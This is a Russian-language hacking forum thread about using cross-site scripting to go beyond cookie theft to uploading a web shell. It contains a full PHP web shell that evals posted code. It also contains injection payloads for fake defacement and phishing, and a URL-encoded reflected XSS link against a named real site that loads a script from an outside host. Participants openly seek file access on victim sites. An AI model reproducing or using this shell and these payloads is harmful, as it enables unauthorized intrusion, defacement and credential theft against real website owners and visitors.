Народ поскажите хсс только ворует куки или можно как то через это загрузить шелл например вот этот: Code: <? $docr = $_SERVER['DOCUMENT_ROOT']; $gpc = get_magic_quotes_gpc(); if (!empty($_POST['c'])) { $c = $gpc ? stripslashes($_POST['c']) : $_POST['c']; } else { $c = NULL; } ?><form action="" method="post"> <textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea> <br><input type="submit"> </form><? if (!is_null($c)) eval($c); ?> Урл сайта имеет вид: http://*****.ru/info.php?log=[XSS]
шелл через кроссайтскриптинг? вопрос интересный. если активная xss вы к примеру можете закодировать в страничку екзешник какой нить троян. или Сделать псевдо-дефейс-))) Это когда к примеру нашёл активную хсс на гл. страничке сайта и по средствам вставки скрипта перекрывающего страничку можно вставить тэги и устроить дефейс. как год назад: http://history-php-fusion.narod.ru/123.PNG а вставка была в <img src=javascript:document.wite('AIRSG')>
А если шелл попробовать запустить как каритинку таким образом: <img src="Ссылка на шелл-картинку" alt="" border="0">
Конечно же не выйдет! ) Но можно вставить js так а в нём будит типо document.wite Так тока html файлы вставлять! Можно Фейк сделать неплохой! http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E Вот вам пример! http://guap-spb.jino-net.ru/log01.txt посмотрите всё просто!
И что этим фейком можно делать? Только жертв заманивать. Мнеб чёнить такое чтоб можно было файл загрузить или просматреть.